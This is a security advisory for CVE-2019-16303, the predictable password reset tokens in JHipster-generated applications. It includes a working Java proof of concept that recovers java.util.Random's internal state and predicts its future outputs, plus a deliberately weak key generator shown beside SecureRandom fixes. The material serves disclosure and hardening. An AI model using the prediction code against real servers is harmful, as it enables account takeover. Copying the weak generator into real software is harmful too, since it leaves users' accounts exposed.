PT-2019-14615 · Jhipster · Jhipster Kotlin

Jonathan Leitschuh · Published 2019-09-13 · Updated 2023-01-20

CVE-2019-16303

CVSS v3.1: 9.8 (Critical)
Vector: AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

Name of the Vulnerable Software and Affected Versions:

JHipster versions prior to 6.3.0

JHipster Kotlin versions prior to 1.2.0

Description:

Applications generated by JHipster (before 6.3.0) and JHipster Kotlin (before 1.2.0) create password reset tokens with `org.apache.commons.lang3.RandomStringUtils`. The overloads that take no `Random` argument draw from a single JVM-wide `java.util.Random`, a 48-bit linear congruential generator whose complete internal state can be recovered from a small amount of its output. This is CWE-338: Use of Cryptographically Weak Pseudo-Random Number Generator (PRNG). Commons Lang is not itself at fault: the `RandomStringUtils` Javadoc states that the `Random` instances it relies on are not cryptographically secure. An attacker who obtains a single reset token (for example by requesting a reset for an account they control) can reverse the generator state and compute every token the server will issue afterwards, then request resets for victim accounts and redeem the predicted tokens, which gives account takeover and privilege escalation for accounts of the attacker's choosing. Proof-of-concept demonstrations exist that reverse the generated values to predict future ones.
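The reversal the description refers to rests on a property of `java.util.Random` that is easy to show directly. The class below is an added example, not JHipster's code and not the published proof of concept: it recovers the generator's 48-bit state from two consecutive `nextInt()` outputs and then predicts the victim generator's future output exactly. The no-argument `RandomStringUtils` methods draw from one JVM-wide `java.util.Random`, so the same state recovery applies to them, although real reset keys pass through RandomStringUtils' character-selection loop, which makes the search from an observed key more involved than this direct case. Class and method names are the example's own.

```java
import java.util.Random;

/**
 * Added example: recovers the 48-bit state of java.util.Random from two consecutive
 * nextInt() outputs and predicts every later output. Names here are the example's own.
 */
public class PredictJavaRandom {
    // Constants from java.util.Random (OpenJDK): a 48-bit linear congruential generator.
    private static final long MULT = 0x5DEECE66DL;
    private static final long ADD  = 0xBL;
    private static final long MASK = (1L << 48) - 1;

    /** One generator step: returns the new 48-bit state. */
    static long step(long state) {
        return (state * MULT + ADD) & MASK;
    }

    /** What nextInt() returns for a given post-step state: its top 32 bits. */
    static int output(long state) {
        return (int) (state >>> 16);
    }

    /**
     * Given two consecutive nextInt() outputs, returns the generator state after the
     * second one, or -1 if no state fits. nextInt() hides only the low 16 bits of the
     * state, so a 65536-candidate search suffices; a false match has probability about
     * 2^16 / 2^32 and is ignored here.
     */
    static long recoverState(int first, int second) {
        long high = ((long) first & 0xFFFFFFFFL) << 16;
        for (long low = 0; low < (1L << 16); low++) {
            long candidate = high | low;          // state that produced `first`
            long next = step(candidate);
            if (output(next) == second) {
                return next;                      // state that produced `second`
            }
        }
        return -1L;
    }

    /**
     * A java.util.Random whose internal state is exactly `state`. The constructor
     * scrambles its argument as (seed ^ MULT) & MASK, so the XOR is pre-applied here.
     */
    static Random cloneFromState(long state) {
        return new Random(state ^ MULT);
    }

    public static void main(String[] args) {
        Random victim = new Random();   // seed unknown to us, as on a real server
        int o1 = victim.nextInt();      // e.g. values leaked through a token we requested
        int o2 = victim.nextInt();

        long state = recoverState(o1, o2);
        if (state < 0) {
            System.out.println("no matching state found");
            return;
        }
        Random clone = cloneFromState(state);
        for (int i = 0; i < 5; i++) {
            int predicted = clone.nextInt();
            int actual = victim.nextInt();
            System.out.printf("predicted %11d  actual %11d  %s%n",
                    predicted, actual, predicted == actual ? "match" : "MISMATCH");
        }
    }
}
```

Seeding the generator from `System.nanoTime()` or any other "unpredictable" value does not help: the state is only 48 bits and is reconstructed from the output, not from the seed. `Math.random()` and `ThreadLocalRandom` share the same construction and are equally unsuitable for security tokens.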

Recommendations:

For JHipster versions prior to 6.3.0, update to version 6.3.0 or later.

For JHipster Kotlin versions prior to 1.2.0, update to version 1.2.0 or later.

As a temporary workaround, modify the generated `RandomUtil` class (`RandomUtil.java`, or `RandomUtil.kt` in JHipster Kotlin) to draw from `java.security.SecureRandom`: replace every `RandomStringUtils` call that lacks a `Random` argument, such as `RandomStringUtils.randomAlphanumeric`, with the overload that accepts the `SecureRandom` instance. Reset tokens issued before the change were produced by the predictable generator and should be invalidated.
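The weak and the hardened generator side by side, as an added example (not the project's generated `RandomUtil` class; the class and method names are this example's own). The hardened version keeps the same 20-character alphanumeric format by handing a `SecureRandom` to the seven-argument `RandomStringUtils.random` overload; a JDK-only variant is included for code bases that would rather not depend on Commons Lang for this at all.

```java
import java.security.SecureRandom;
import java.util.Base64;
import org.apache.commons.lang3.RandomStringUtils;

/**
 * Added example contrasting the weak reset-key generator with hardened ones.
 * Names are the example's own, not JHipster's.
 */
public final class ResetKeyExamples {
    private static final int DEF_COUNT = 20;

    /**
     * Weak: the no-Random overloads of RandomStringUtils draw from one static
     * java.util.Random shared by the whole JVM, so a single observed key exposes the
     * state from which every later key for every user is derived.
     */
    static String weakResetKey() {
        return RandomStringUtils.randomAlphanumeric(DEF_COUNT);
    }

    // One SecureRandom for the class; it is safe to share across threads and seeds
    // itself from the platform CSPRNG, so earlier keys reveal nothing about later ones.
    private static final SecureRandom SECURE_RANDOM = new SecureRandom();

    /**
     * Hardened, same alphabet and length: random(count, start, end, letters, numbers,
     * chars, random). With start = end = 0 and chars = null, letters = numbers = true
     * selects the full letters-and-digits range that randomAlphanumeric uses.
     */
    static String secureResetKey() {
        return RandomStringUtils.random(DEF_COUNT, 0, 0, true, true, null, SECURE_RANDOM);
    }

    /**
     * Hardened without Commons Lang: 160 bits straight from SecureRandom, base64url
     * encoded without padding so the key can be embedded in a reset URL unchanged.
     */
    static String secureResetKeyJdkOnly() {
        byte[] bytes = new byte[20];
        SECURE_RANDOM.nextBytes(bytes);
        return Base64.getUrlEncoder().withoutPadding().encodeToString(bytes);
    }

    public static void main(String[] args) {
        System.out.println("weak     : " + weakResetKey());
        System.out.println("secure   : " + secureResetKey());
        System.out.println("jdk only : " + secureResetKeyJdkOnly());
    }
}
```

A quick audit check for either code base: grep for `RandomStringUtils.random` and `new Random(` and confirm that every call feeding a token, key or password either passes a `SecureRandom` explicitly or has been replaced by one. Switching the generator does not shorten the lifetime or single-use property of a token; those remain the reset flow's responsibility.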

Weakness Enumeration

CWE-338: Use of Cryptographically Weak Pseudo-Random Number Generator (PRNG)
Related Identifiers

CVE-2019-16303
GHSA-J3RH-8VWQ-WH84
GHSA-MWP6-J9WF-968C

Affected Products

Apache Commons Lang
Jhipster
Jhipster Kotlin